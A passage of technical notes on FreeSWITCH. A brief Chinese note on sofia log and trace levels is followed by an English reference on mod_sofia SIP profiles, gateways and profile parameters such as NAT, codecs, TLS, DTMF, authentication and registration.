模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","title":"FS日志设置"},{"content":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.e., to local extensions). 
To add a SIP Provider (Sofia User Agent) to your FreeSWITCH, please see the Interoperability Examples and add the SIP Provider information in an .xml file stored under conf/sip_profiles/\nClick here to expand Table of Contents\nSofia allows for multiple User Agents A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for running a certain network protocol, and a Sofia UA is the same thing but the protocol in that case is SIP. When FreeSWITCH starts, it reads the conf/autoload_configs/sofia.conf.xml file. That file contains a \u0026ldquo;X-PRE-PROCESS\u0026rdquo; directive which instructs FreeSWITCH to subsequently load and merge any conf/sip_profiles/*.xml files. Each *.xml file so loaded and merged should contain a complete description of one or more SIP Profiles. Each SIP Profile so loaded is part of a \u0026ldquo;User Agent\u0026rdquo; or \u0026ldquo;UA\u0026rdquo;; in FreeSWITCH terms, UA = User Agent = Sofia Profile = SIP Profile. Note that the individual UAs so loaded are all merged together by FreeSWITCH and must not interfere with each other: In particular, each UA must have its own unique port on which it accepts connections (the default port for SIP is 5060).\nMultiple User Agents (Profiles) and the Dialplan Why might you want to create multiple User Agents? Here\u0026rsquo;s an example. In my office, I use a firewall. This means that calls I make to locations outside the firewall must use a STUN server to transverse the NAT in the firewall, while calls within the office don\u0026rsquo;t need to use a STUN server. In order to accommodate these requirements, I\u0026rsquo;ve created two different UAs. One of them uses a STUN server and for that matter also connects up to the PSTN through a service provider. The other UA is purely for local SIP calls. Now I\u0026rsquo;ve got two UAs defined by my profiles, each of which can handle a call. When dialing a SIP address or telephone number, which UA is used? 
That determination is made in the dialplan. One syntax for making a call via Sofia in the dialplan is sofia/profile_name/destination\nSo, the task becomes rather straightforward. Dialplans use pattern matching and other tricks to determine how to handle a call. My dialplan examines what I\u0026rsquo;ve dialed and then determines what profile to use with that call. If I dial a telephone number, the dialplan selects the UA that connects up to the PSTN. If I dial a SIP address outside the firewall, the dialplan selects that same UA because it uses the STUN server. But if I dial a SIP address that\u0026rsquo;s inside the firewall, the dialplan selects the \u0026ldquo;local\u0026rdquo; UA. To understand how to write dialplans, use pattern matching, etc., see Dialplan\nThe Relationship Between SIP Profiles and Domains The following content was written in a mailing list thread by Anthony Minessale in response to questions about how SIP profiles relate to domain names in FreeSWITCH. The best thing to do is take a look at these things from a step back. The domains inside the XML registry are completely different from the domains on the internet and again completely different from domains in sip packets. The profiles are again entirely different from any of the above. Its up to you to align them if you so choose. The default configuration distributed with FreeSWITCH sets up the scenario most likely to load on any machine and work out of the box. That is the primary goal of that configuration, so, It sets the domain in both the directory, the global default domain variable and the name of the internal profile to be identical to the IP addr on the box that can reach the internet. Then it sets the sip to force everything to that value. When you want to detach from this behavior, you are probably on a venture to do some kind of multi-home setup. Aliases in the tag are a list of keys you want to use to use that lead to the current profile your are configuring. 
Think of it as the /etc/hosts file in Unix, only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile. The tag is an indicator telling the profile to open the XML registry in FreeSWITCH and run through any domains defined therein. The 2 key attributes are: alias: [true/false] (automatically create an alias for this domain as mentioned above) parse: [true/false] (scan the domain for gateway entries and include them into this profile) name: [] (either the name of a specific domain or \u0026lsquo;all\u0026rsquo; to denote parsing every domain in the directory)\nAs you showed in your question the default config has If you apply what you have learned above, it will scan for every domain (there is only one by default) and add an alias for it and not parse it for gateways. The default directory uses global config vars to set the domain to match the local IP addr on the box. So now you will have a domain in your config that is your IP addr, and the internal profile will attach to it and add an alias so that value expands to match it. This is explained in a comment at the top of directory/default.xml: FreeSWITCH works off the concept of users and domains just like email. You have users that are in domains for example 1000@domain.com.\nWhen freeswitch gets a register packet it looks for the user in the directory based on the from or to domain in the packet depending on how your sofia profile is configured. Out of the box the default domain will be the IP address of the machine running FreeSWITCH. This IP can be found by typing \u0026ldquo;sofia status\u0026rdquo; at the CLI. You will register your phones to the IP and not the hostname by default. 
If you wish to register using the domain please open vars.xml in the root conf directory and set the default domain to the hostname you desire. Then you would use the domain name in the client instead of the IP address to register with FreeSWITCH.\nSo having more than one profile with the default of is going to end up aliasing the same domains into all profiles who call it and cause an overwrite in the lookup table and probably an error in your logs somewhere. If you had parse=\u0026ldquo;true\u0026rdquo; on all of them, they would all try and register to the gateways in all of your domains. If you look at the stock config, external.xml is a good example of a secondary profile, it has so no aliases, and yes parse \u0026hellip; the exact opposite of the internal so that all the gateways would register from external and internal would bind to the local IP addr. So, you probably want to use separate per domain per profile you want to bind it to in more complicated setups.\nStructure of a Profile Each profile may contain several different subsections. At the present time there\u0026rsquo;s no XSD or DTD for sofia.conf.xml — and any volunteer who can create one would be very welcome indeed.\nGateway Each profile can have several gateways: elements\u0026hellip; elements\u0026hellip; A gateway has an attribute \u0026ldquo;name\u0026rdquo; by which it can be referred. A gateway describes how to use a different UA to reach destinations. For example, the gateway may provide access to the PSTN, or to a private SIP network. The reason for defining a gateway, presumably, is because the gateway requires certain information before it will accept a call from the FreeSWITCH User Agent. Variables can be defined on a gateway. Inbound variables are set on the channel of a call received from a gateway, outbound variables are set on the channel of a call sent to a gateway. 
An example gateway configuration would be: To reach a particular gateway from the dial plan, use sofia/gateway/\u0026lt;gateway_name\u0026gt;/\nFreeSWITCH can also subscribe to receive notification of events from the gateway. For more information see Presence - Use FreeSWITCH as a Client\nParameters The following is a list of param elements that are children of a gateway element:\nNote: The username param for the gateway is not to be confused with the username param in the Profile settings config!\nNote: extension parameter influence the contents of channel variable Caller-Destination-Number and destination_number. If it is blank, Caller-Destination-Number will always be set to gateway\u0026rsquo;s username. If it has a value, Caller-Destination-Number will always be set to this value. If it has value auto_to_user, Caller-Destination-Number will be populated with value ${sip_to_user} which means the real dialled number in case of an inbound call.\nping-min means \u0026ldquo;how many successful pings we must have before declaring a gateway up\u0026rdquo;. The interval between ping-min and ping-max is the \u0026ldquo;safe area\u0026rdquo; where a gateway is marked as UP. So if we have, for example, min 3 and max 6, if the gateway is up and we move counter between 3,4,5,6 the gateway will be up. If from 6 we loose 4 (so counter == 2) pings in a row, the gateway will be declared down. Please note that on sofia startup the gateway is always started as UP, so it will be up even if ping-min is \u0026gt; 1 . the \u0026ldquo;right\u0026rdquo; way starts when the gateway goes down.\nParam \u0026ldquo;register,\u0026rdquo; is used when this profile acts as a client to another UA. By registering, FreeSWITCH informs the other UA of its whereabouts. This is generally used when FreeSWITCH wants the other UA to send FreeSWITCH calls, and the other UA expects this sort of registration. 
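The gateway element described above can be sketched as follows. This is an illustrative example only: the gateway name, credentials, and realm are placeholders, and only parameters documented in this section (register, ping, extension-in-contact, directional variables) are used.

```xml
<!-- inside a profile's <gateways> section -->
<gateway name="mygateway">
  <param name="username" value="user1000"/>
  <param name="password" value="secret"/>
  <param name="realm" value="sip.example.com"/>
  <!-- register with the remote UA so it knows where to send us calls -->
  <param name="register" value="true"/>
  <!-- probe availability with SIP OPTIONS every 25 seconds (minimum is 5) -->
  <param name="ping" value="25"/>
  <!-- use extension@ip rather than gw+mygateway@ip in the Contact -->
  <param name="extension-in-contact" value="true"/>
  <variables>
    <!-- set on the channel of calls sent to this gateway -->
    <variable name="absolute_codec_string" value="PCMU,PCMA" direction="outbound"/>
  </variables>
</gateway>
```

A call would then be routed to it from the dialplan as sofia/gateway/mygateway/destination.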
If FreeSWITCH uses the other UA only as a gateway (e.g., to the PSTN), then registration is not generally required. Param \u0026ldquo;distinct-to\u0026rdquo; is used when you want FS to register using a distict AOR for header To. It requires proper setting of related parameters. For example if you want the REGISTER to go with: From: sip:someuser@somedomain.com To: sip:anotheruser@anotherdomain.com\nThen set the parameters as this: The latter param, \u0026ldquo;ping\u0026rdquo; is used to check gateway availability. By setting this option, FreeSWITCH will send SIP OPTIONS packets to gateway. If gateway responds with 200 or 404, gateway is pronounced up, otherwise down. [N.B. It appears that other error messages can be returned and still result in the gateway being marked as \u0026lsquo;up\u0026rsquo;?] If any call is routed to gateway with state down, FreeSWITCH will generate NETWORK_OUT_OF_ORDER hangup cause. Ping frequency is defined in seconds (value attribute) and has a minimum value of 5 seconds. Param \u0026ldquo;extension-in-contact\u0026rdquo; is used to force what the contact info will be in the registration. If you are having a problem with the default registering as gw+gateway_name@ip you can set this to true to use extension@ip. If extension is blank, it will use username@ip.\nif you need to insert the FROM digits to the Contact URI User Part when sending call to gateway BEFORE From: \u0026ldquo;8885551212\u0026rdquo; sip:88855512120@8.8.8.8 Contact: sip:gw+mygateway@7.7.7.7:7080 try adding these to gateway params\nThese channel variables will be set on all calls going through this gateway in the specified direction. However, see below for a special syntax to set profile variables rather than channel variables. Settings Settings include other, more general information about the profile, including whether or not STUN is in use. Each profile has its own settings element. 
Not only is this convenient — it\u0026rsquo;s possible to set up one profile to use STUN and another, with a different gateway or working behind the firewall, not needing STUN — but it\u0026rsquo;s also crucial. That\u0026rsquo;s because each profile defines a SIP User Agent, and each UA must have its own unique \u0026ldquo;sip-port.\u0026rdquo; By convention, 5060 is the default port, but it\u0026rsquo;s possible to make calls to, e.g., \u0026ldquo;foo@sip.example.com:5070\u0026rdquo;, and therefore you can define any port you please for each individual profile. The conf directory contains a complete sample sofia.conf.xml file, along with comments. See Git examples: Internal, External\nBasic settings alias This seems to make the SIP profile bind to this IP \u0026amp; port as well as your SIP / RTP IPs and ports. Anthony had this to say about aliases in a ML thread: Aliases in the tag are a list of keys you want to use to use that lead to the current profile your are configuring. Think of it as the /etc/hosts file in unix only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile.\nshutdown-on-fail If set to true and the profile fails to load, FreeSWITCH will shut down. This is useful if you are running something like Pacemaker and OpenAIS which manage a pair of FreeSWITCH nodes and automatically monitor, start, stop, restart, and standby-on-fail the nodes. It will ensure that the specific node is not able to be used in a \u0026ldquo;partially up\u0026rdquo; situation.\nuser-agent-string This sets the User-Agent header in all SIP messages sent by your server. By default this could be something like \u0026ldquo;FreeSWITCH-mod_sofia/1.0.trunk-12805\u0026rdquo;. 
If you didn\u0026rsquo;t want to advertise detailed version information you could simply set this to \u0026ldquo;FreeSWITCH\u0026rdquo; or even \u0026ldquo;Asterisk PBX\u0026rdquo; as a joke. Take care when setting this value as certain characters such as \u0026lsquo;@\u0026rsquo; could cause other SIP proxies could reject your messages as invalid.\nlog-level sip-trace context Dialplan context in which to dump calls that come in to this profile\u0026rsquo;s ip:port\nsip-port Port to bind to for SIP traffic:\nsip-ip IP address to bind to for SIP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES\nrtp-ip IP address to bind to for RTP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES Multiple rtp-ip support: if more rtp-ip parameters are added, they will be used in round-robin as new calls progress. IPv6 addresses are not supported under Windows at the time of writing. See FS-4445 ext-rtp-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for RTP. Possible values are: Any variable from vars.xml, e.g. $${external_rtp_ip}:\n\u0026ldquo;specific IP address\u0026rdquo;\n\u0026ldquo;when used for LAN and WAN to avoid errors in the SIP CONTACT sent to LAN devices, use\u0026rdquo;\n\u0026ldquo;auto\u0026rdquo;: the guessed IP will be used (guessed by looking in the IP routing table which interface is the default route)\n\u0026ldquo;auto-nat\u0026rdquo;: FreeSWITCH will use uPNP or NAT-PMP to discover the public IP address it should use\n\u0026ldquo;stun:DNS name or IP address\u0026rdquo;: FreeSWITCH will use the STUN server of your choice to discover the public IP address\n\u0026ldquo;host:DNS name\u0026rdquo;: FreeSWITCH will resolve the DNS name as the public IP address, so you can use a dynamic DNS host\nATTENTION: AS OF 2012Q4, \u0026rsquo;ext–\u0026rsquo; prefixed params cited above when populated with to-be-resolved DNS strings \u0026ndash; e.g. 
name=\u0026ldquo;ext–sip–ip\u0026rdquo; value=\u0026ldquo;stun:stun.freeswitch.org\u0026rdquo; or name=\u0026ldquo;ext‑rtp–ip\u0026rdquo; value=\u0026ldquo;host:mypublicIP.dyndns.org\u0026rdquo; \u0026ndash; are resolved to IP addresses once only at FS load time and const thereafter. FS is blind to (unaware of) any subsequent changes in your environment\u0026rsquo;s IP address. Thus, these ext– vars may become functionally incompatible with the environment\u0026rsquo;s current IP addresses with unspecified results in call flow at the network layer. FS restart is required for FS to capture the now-current, working IP address(es).\next-sip-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for SIP. Possibles values are the same as those for ext-rtp-ip, and it is usually set to the same value.\ntcp-keepalive Set this to interval (in milliseconds) to send keep alive packets to user agents (UAs) registered via TCP; do not set to disable.\ntcp-pingpong tcp-ping2pong dialplan The dialplan parameter is very powerful. In the simplest configuration, it will use the XML dialplan. This means that it will read data from mod_xml_curl XML dialplans (e.g., callback to your webserver), or failing that, from the XML files specified in freeswitch.xml dialplan section. (e.g. 
default_context.xml)\nYou can also add enum lookups into the picture (since mod_enum provides dialplan functionality), so enum lookups override the XML dialplan\nOr reverse the order so enum is only consulted if the XML lookup fails\nIt is also possible to specify a specific enum root\nOr use XML from a custom file\nWhere it will first check the specific XML file, then hit normal XML, which will also do a mod_xml_curl lookup assuming you have that configured and working.\nMedia related options See also: Proxy Media\nresume-media-on-hold When calls are in no media this will bring them back to media when you press the hold button. To return the calls to bypass-media after the call is unheld, enable bypass-media-after-hold.\nbypass-media-after-att-xfer This will allow a call to go back to bypass media after an attended transfer. bypass-media-after-hold This will allow a call to go back to bypass media after a hold. This option can be enabled only if resume-media-on-hold is set. Available from git rev 8fa385b. inbound-bypass-media Uncomment to set all inbound calls to no media mode. This means that the FreeSWITCH server only keeps the SIP message state, but has the RTP stream go directly from end-point to end-point\ninbound-proxy-media Uncomment to set all inbound calls to proxy media mode. This means FreeSWITCH keeps both the SIP and RTP traffic on the server but does not interact with the RTP stream.\ndisable-rtp-auto-adjust ignore-183nosdp enable-soa Set the value to \u0026ldquo;false\u0026rdquo; to disable SIP SOA in sofia, telling sofia not to touch the exchange of SDP\nt38-passthru The following options are available\n\u0026lsquo;true\u0026rsquo; enables t38 passthru \u0026lsquo;false\u0026rsquo; disables t38 passthru \u0026lsquo;once\u0026rsquo; enables t38 passthru, but sends the t.38 re-invite only once (available since commit 08b25a8 from Nov.
9, 2011) Codecs related options Also see:\nCodec Negotiation Supported Codecs inbound-codec-prefs This parameter allows to change the allowed inbound codecs per profile. outbound-codec-prefs This parameter allows to change the outbound codecs per profile. codec-prefs This parameter allows to change both inbound-codec-prefs and outbound-codec-prefs at the same time. inbound-codec-negotiation set to \u0026lsquo;greedy\u0026rsquo; if you want your codec list to take precedence if \u0026lsquo;greedy\u0026rsquo; doesn\u0026rsquo;t work for you, try \u0026lsquo;scrooge\u0026rsquo; which has been known to fix misreported ptime issues with DID providers such as CallCentric. A rule of thumb is:\n\u0026lsquo;generous\u0026rsquo; permits the remote codec list have precedence and \u0026lsquo;win\u0026rsquo; the codec negotiation and selection process \u0026lsquo;greedy\u0026rsquo; forces a win by the local FreeSWITCH preference list \u0026lsquo;scrooge\u0026rsquo; takes \u0026lsquo;greedy\u0026rsquo; a step further, so that the FreeSWITCH wins even when the far side lies about capabilities during the negotiation process sip_codec_negotiation is a channel variable version of this setting\ninbound-late-negotiation Uncomment to let calls hit the dialplan before you decide if the codec is OK. bitpacking This setting is for AAL2 bitpacking on G.726. disable-transcoding Uncomment if you want to force the outbound leg of a bridge to only offer the codec that the originator is using\nrenegotiate-codec-on-reinvite STUN If you need to use a STUN server, here are common working examples:\next-rtp-ip stun.fwdnet.net is a publicly-accessible STUN server.\next-sip-ip stun-enabled Simple traversal of UDP over NATs (STUN), is used to help resolve the problems associated with SIP clients, behind NAT, using private IP address space in their messaging. 
Use stun when specified (default is true).\nstun-auto-disable Set to true to have the profile determine stun is not useful and turn it off globally\nNATing apply-nat-acl When receiving a REGISTER or INVITE, enable NAT mode automatically if IP address in Contact header matches an entry defined in the RFC 1918 access list. \u0026ldquo;acl\u0026rdquo; is a misnomer in this case because access will not be denied if the user\u0026rsquo;s contact IP doesn\u0026rsquo;t match.\naggressive-nat-detection This will enable NAT mode if the network IP/port from which the request was received differs from the IP/Port combination in the SIP Via: header, or if the Via: header contains the received parameter (regardless of what it contains.) Note 2009-04-05: Someone please clarify when this would be useful. It seems to me if someone needed this feature, chances are that things are so broken that they would need to use NDLB-force-rport\nVAD and CNG VAD stands for Voice Activity Detector. FreeSWITCH is capable of detecting speech and can stop transmitting RTP packets when no voice is detected.\nvad suppress-cng Suppress Comfort Noise Generator (CNG) on this profile or per call with the \u0026lsquo;suppress_cng\u0026rsquo; variable\nNDLB (A.K.A. No device left behind) NDLB-force-rport This will force FreeSWITCH to send SIP responses to the network port from which they were received. Use at your own risk! For more information see NAT Traversal.\nsafe = param that does force-rport behavior only on endpoints we know are safe to do so on. 
This is a dirty hack to try to work with certain endpoints behind SonicWall firewalls that do not use the same port when they do NAT, when the devices do not support rport, while not breaking devices that actually use different ports, which force-rport would break.\nNDLB-broken-auth-hash Used for when phones respond to a challenged ACK with method INVITE in the hash\nNDLB-received-in-nat-reg-contact add a ;received=\u0026quot;:\u0026quot; to the contact when replying to register for NAT handling\nNDLB-sendrecv-in-session By default, \u0026ldquo;a=sendrecv\u0026rdquo; is only included in the media portion of the SDP. While this is RFC-compliant, it may break functionality for some SIP devices. To also include \u0026ldquo;a=sendrecv\u0026rdquo; in the session portion of the SDP, set this parameter to true.\nNDLB-allow-bad-iananame Introduced in rev. 15401; this was enabled by default prior to the new param. Will allow codecs to match their respective name even if the given string is not correct. For example, Linksys and Sipura phones will pass G.729a by default instead of G.729 as the codec string, therefore not matching. If you wish to allow bad IANA names to match the respective codec string, add the following param to your SIP profile. Refer to RFC 3551, RFC 3555 and the IANA list(s) for SDP\nCall ID inbound-use-callid-as-uuid On inbound calls make the uuid of the session equal to the SIP call id of that call.\noutbound-use-uuid-as-callid On outbound calls set the callid to match the uuid of the session\nThis goes in the \u0026ldquo;..sip_profiles/external.xml\u0026rdquo; file.\nTLS Please make sure to read SIP TLS before enabling certain features below as they may not behave as expected.\ntls TLS: disabled by default, set to \u0026ldquo;true\u0026rdquo; to enable tls-only disabled by default; when enabled, prevents sofia from listening on the unencrypted port for this connection.
This can stop many generic brute force scripts and, if all your clients connect over TLS, can help decrease the exposure of your FreeSWITCH server to the world. tls-bind-params additional bind parameters for TLS tls-sip-port Port to listen on for TLS requests. (5061 will be used if unspecified) tls-cert-dir Location of the agent.pem and cafile.pem ssl certificates (needed for TLS server) tls-version TLS version (\u0026ldquo;sslv2\u0026rdquo;, \u0026ldquo;sslv3\u0026rdquo;, \u0026ldquo;sslv23\u0026rdquo;, \u0026ldquo;tlsv1\u0026rdquo;, \u0026ldquo;tlsv1.1\u0026rdquo;, \u0026ldquo;tlsv1.2\u0026rdquo;). NOTE: Phones may not work with TLSv1 When not set defaults to: \u0026ldquo;tlsv1,tlsv1.1,tlsv1.2\u0026rdquo;\ntls-passphrase If your agent.pem is protected by a passphrase, put the passphrase here to enable FreeSWITCH to decrypt the key. tls-verify-date Whether the client/server certificate should have its date validated to ensure it is not expired and is currently active. tls-verify-policy This controls what, if any, security checks are done against server/client certificates. Verification generally means checking that certificates are valid against the cafile.pem. Set to \u0026lsquo;in\u0026rsquo; to only verify incoming connections, \u0026lsquo;out\u0026rsquo; to only verify outgoing connections, \u0026lsquo;all\u0026rsquo; to verify all connections; there are also \u0026lsquo;subjects_in\u0026rsquo;, \u0026lsquo;subjects_out\u0026rsquo; and \u0026lsquo;subjects_all\u0026rsquo; for subject validation (subject validation for outgoing connections is against the hostname/IP being connected to). Multiple policies can be split with a \u0026lsquo;|\u0026rsquo; pipe, for example \u0026lsquo;subjects_in|subjects_out\u0026rsquo;. Defaults to none. tls-verify-depth When certificate validation is enabled (tls-verify-policy), how deep we should try to verify a certificate up the chain against the cafile.pem file. By default only a depth of 2.
tls-verify-in-subjects If subject validation is enabled for incoming connections (tls-verify-policy set to \u0026lsquo;subjects_in\u0026rsquo; or \u0026lsquo;subjects_all\u0026rsquo;) this is the list of subjects that are allowed (delimit with a \u0026lsquo;|\u0026rsquo; pipe), note this only effects incoming connections for outgoing connections subjects are always checked against hostnames/ips. DTMF rfc2833-pt TODO RFC 2833 is obsoleted by RFC 4733.\ndtmf-duration dtmf-type TODO RFC 2833 is obsoleted by RFC 4733. Set the parameter in the SIP profile:\nor\nor\nOR set the variable in the SIP gateway or user profile (NOT in the channel, it must be before CS_INIT): Note the \u0026ldquo;_\u0026rdquo; instead of \u0026ldquo;-\u0026rdquo; in profile param (this is var set in dialplan). (24.10.2010: \u0026ldquo;both\u0026rdquo; don\u0026rsquo;t seem to me work in my tests, \u0026ldquo;outbound\u0026rdquo; does) Note: for inband DTMF, Misc. Dialplan Tools start_dtmf must be used in the dialplan. Also, to change the outgoing routing from info or rfc2833 to inband, use Misc._Dialplan_Tools_start_dtmf_generate RFC 2833\npass-rfc2833 TODO RFC 2833 is obsoleted by RFC 4733. Default: false If true, it passes RFC 2833 DTMF\u0026rsquo;s from one side of a bridge to the other, untouched. Otherwise, it decodes and re-encodes them before passing them on.\nliberal-dtmf TODO RFC 2833 is obsoleted by RFC 4733. Default: false For DTMF negotiation, use this parameter to just always offer 2833 and accept both 2833 and INFO. 
Use of this parameter is not recommended since its purpose is to try to cope with buggy SIP implementations.\nSIP Related options enable-timer This enables or disables support for RFC 4028 SIP Session Timers.\nNote: If your switch requires the timer option; for instance, Huawei SoftX3000, it needs this optional field and drops the calls with \u0026ldquo;Session Timer Check Message Failed\u0026rdquo;, then you may be able to revert back the commit that took away the Require: timer option which is an optional field by: git log -1 -p 58c3c3a049991fedd39f62008f8eb8fca047e7c5 libs/sofia-sip/libsofia-sip-ua | patch -p1 -R touch libs/sofia-sip/.update\nmake mod_sofia-clean make mod_sofia-install\nenable-100rel This enable support for 100rel (100% reliability - PRACK message as defined in RFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, see FSCORE-392.\nminimum-session-expires This sets the \u0026ldquo;Min-SE\u0026rdquo; value (in seconds) from RFC 4028. This value must not be less than 90 seconds.\nsip-options-respond-503-on-busy When set to true, this param will make FreeSWITCH respond to incoming SIP OPTIONS with 503 \u0026ldquo;Maximum Calls In Progress\u0026rdquo; when FS is paused or maximum sessions has been exceeded. When set to false or when not set at all (default behavior), SIP OPTIONS are always responded with 200 \u0026ldquo;OK\u0026rdquo;.\nSetting this param to true is especially useful if you\u0026rsquo;re using a proxy such as OpenSIPS or Kamailio with dispatcher module to probe your FreeSWITCH servers by sending SIP OPTIONS.\nsip-force-expires Setting this param overrides the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. 
This param can be overridden per individual user by setting a sip-force-expires user directory variable.\nsip-expires-max-deviation Setting this param adds a random deviation to the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. Result will be that clients will not re-register at the same time-interval thus spreading the load on your system. For example, if you set:\nthen the expires that is responded will be between 1800-600=1200 and 1800+600=2400 seconds. This param can be overridden per individual user by setting a sip-expires-max-deviation user directory variable.\noutbound-proxy Setting this param will send all outbound transactions to the value set by outbound-proxy. send-display-update Tells FreeSWITCH not to send display UPDATEs to the leg of the call. RTP Related options auto-jitterbuffer-msec Set this to the size of the jitterbuffer you would like to have on all calls coming through this profile.\nrtp-timer-name rtp-rewrite-timestamps If you don\u0026rsquo;t want to pass through timestamps from 1 RTP stream to another, rtp-rewrite-timestamps is a parameter you can set in a SIP Profile (on a per call basis with rtp_rewrite_timestamps chanvar in a dialplan). The result is that FreeSWITCH will regenerate and rewrite the timestamps in all the RTP streams going to an endpoint using this SIP Profile. This could be necessary to fix audio issues when sending calls to some paranoid and not RFC-compliant gateways (Cirpack is known to require this).\nmedia_timeout was: rtp-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. 
If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nmedia_hold_timeout was: rtp-hold-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) for a call placed on hold by an endpoint before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nrtp-autoflush-during-bridge Controls what happens if FreeSWITCH detects that it\u0026rsquo;s not keeping up with the RTP media (audio) stream on a bridged call. (This situation can happen if the FreeSWITCH server has insufficient CPU time available.) When set to \u0026ldquo;true\u0026rdquo; (the default), FreeSWITCH will notice when more than one RTP packet is waiting to be read in the incoming queue. If this condition persists for more than five seconds, RTP packets will be discarded to \u0026ldquo;catch up\u0026rdquo; with the audio stream. For example, if there are always five extra 20 ms packets in the queue, 100 ms of audio latency can be eliminated by discarding the packets. This will cause an audio glitch as some audio is discarded, but will improve the latency by 100 ms for the rest of the call. If rtp-autoflush-during-bridge is set to false, FreeSWITCH will instead preserve all RTP packets on bridged calls, even if it increases the latency or \u0026ldquo;lag\u0026rdquo; that callers hear.\nrtp-autoflush Has the same effect as \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, but affects NON-bridged calls (such as faxes, IVRs and the echo test). Unlike \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, the default is false, meaning that high-latency packets on non-bridged calls will not be discarded. This results in smoother audio at the possible expense of increasing audio latency (or \u0026ldquo;lag\u0026rdquo;). 
Setting \u0026ldquo;rtp-autoflush\u0026rdquo; to true will discard packets to minimize latency when possible. Doing so may cause errors in DTMF recognition, faxes, and other processes that rely on receiving all packets.\nAuth These settings deal with authentication: requirements for identifying SIP endpoints to FreeSWITCH.\nchallenge-realm Choose the realm challenge key. Default is auto_to if not set. auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. If you want URL dialing to work you\u0026rsquo;ll want to set this to auto_from. If you use any other value besides auto_to or auto_from you\u0026rsquo;ll lose the ability to do multiple domains. Note: comment out to restore the behavior before 2008-09-29\naccept-blind-auth accept any authentication without actually checking (not a good feature for most people)\nauth-calls Users in the directory can have \u0026ldquo;auth-acl\u0026rdquo; parameters applied to them so as to restrict users\u0026rsquo; access to a predefined ACL or a CIDR.\nValue can be \u0026ldquo;false\u0026rdquo; to disable authentication on this profile, meaning that when calls come in the profile will not send an auth challenge to the caller.\nlog-auth-failures Write log entries ( Warning ) on authentication failures ( Registration \u0026amp; Invite ). Useful for users wishing to use fail2ban. note: Required SVN#15654 or higher\nauth-all-packets On authed calls, authenticate all the packets instead of only INVITE and REGISTER (Note: OPTIONS, SUBSCRIBE, INFO and MESSAGE are not authenticated even with this option set to true, see http://jira.freeswitch.org/browse/FS-2871)\nRegistration disable-register disable register which may be undesirable in a public switch\nmultiple-registrations Valid values for this parameter are \u0026ldquo;contact\u0026rdquo;, \u0026ldquo;true\u0026rdquo;, \u0026ldquo;false\u0026rdquo;. 
value=\u0026ldquo;true\u0026rdquo; is the most common use. Setting this value to \u0026ldquo;contact\u0026rdquo; will remove the old registration based on sip_user, sip_host and contact field as opposed to the call_id.\nmax-registrations-per-extension Defines the number of maximum registrations per extension. Valid value for this parameter is an integer greater than 0. Please note that setting this to 1 would counteract the usage of multiple-registrations. When an attempt to register an extension is made after the maximum value has been reached sofia will respond with 403. The following example will set maximum registrations to 2\ninbound-reg-force-matching-username Force the user and auth-user to match.\nforce-publish-expires Force custom presence update expires delta (-1 means endless)\nforce-register-domain all inbound registrations will look in this domain for the users. Comment out to use multiple domains\nforce-register-db-domain all inbound reg will stored in the db using this domain. Comment out to use multiple domains\nsend-message-query-on-register Can be set to \u0026rsquo;true\u0026rsquo;, \u0026lsquo;false\u0026rsquo; or \u0026lsquo;first-only\u0026rsquo;. If set to \u0026rsquo;true\u0026rsquo; (this is the default behavior), mod_sofia will send a message-query event upon registration. mod_voicemail uses this for counting messages.\nIf set to \u0026lsquo;first-only\u0026rsquo;, only the first REGISTER will trigger the message-query (it requires the UA to increment the NC on subsequent REGISTERs. Some phones, snom for instance, do not do this). 
